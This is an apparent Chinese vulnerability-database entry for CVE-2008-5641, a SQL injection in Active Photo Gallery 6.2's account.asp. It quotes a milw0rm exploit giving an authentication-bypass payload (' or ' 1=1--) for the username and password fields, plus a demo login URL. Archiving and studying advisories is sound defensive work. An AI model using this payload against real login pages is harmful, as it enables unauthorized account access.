https://www.exploit-db.com/exploits/7299
https://cxsecurity.com/issue/WLB-2008120160
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-333
Active Photo Gallery 'account.asp'SQL注入攻击漏洞






漏洞ID | 1116887 | 漏洞类型 | SQL注入 |
发布时间 | 2008-11-30 | 更新时间 | 2009-01-29 |
![]() |
CVE-2008-5641 | ![]() |
CNNVD-200812-333 |
漏洞平台 | PHP | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
ActivePhotoGallery是一款基于web的相片簿管理及搜索软件系统。ActivePhotoGallery6.2版本的account.asp中存在SQL注入漏洞。远程攻击者可以借助(1)用户名和(2)密码参数,执行任意SQL指令。
|漏洞EXP
[~] ----------------------------بسم الله الرØÙ…Ù† الرØÙŠÙ…------------------------------
[~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
[~]Vendor:www.activewebsoftwares.com
[~]Software: Active Photo Gallery v 6.2
[~]author: ((Ñ3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------{str0ke}------------------------------
[~] Exploit:
username: r0' or ' 1=1--
password: r0' or ' 1=1--
[~]login 4 d3m0:
http://www.activewebsoftwares.com/demoactivephotogallery/account.asp
[~]-----------------------------{str0ke}---------------------------------------------------
[~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
[~]
[~] spechial thanks : dolly & 7am3m & عماد ,الزهيري
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]--------------------------------------------------------------------------------
# milw0rm.com [2008-11-30]
|参考资料
来源:MILW0RM
名称:7299
链接:http://www.milw0rm.com/exploits/7299
来源:VUPEN
名称:ADV-2008-3297
链接:http://www.frsirt.com/english/advisories/2008/3297
来源:SREASON
名称:4767
链接:http://securityreason.com/securityalert/4767
来源:SECUNIA
名称:32901
链接:http://secunia.com/advisories/32901
检索漏洞
开始时间
结束时间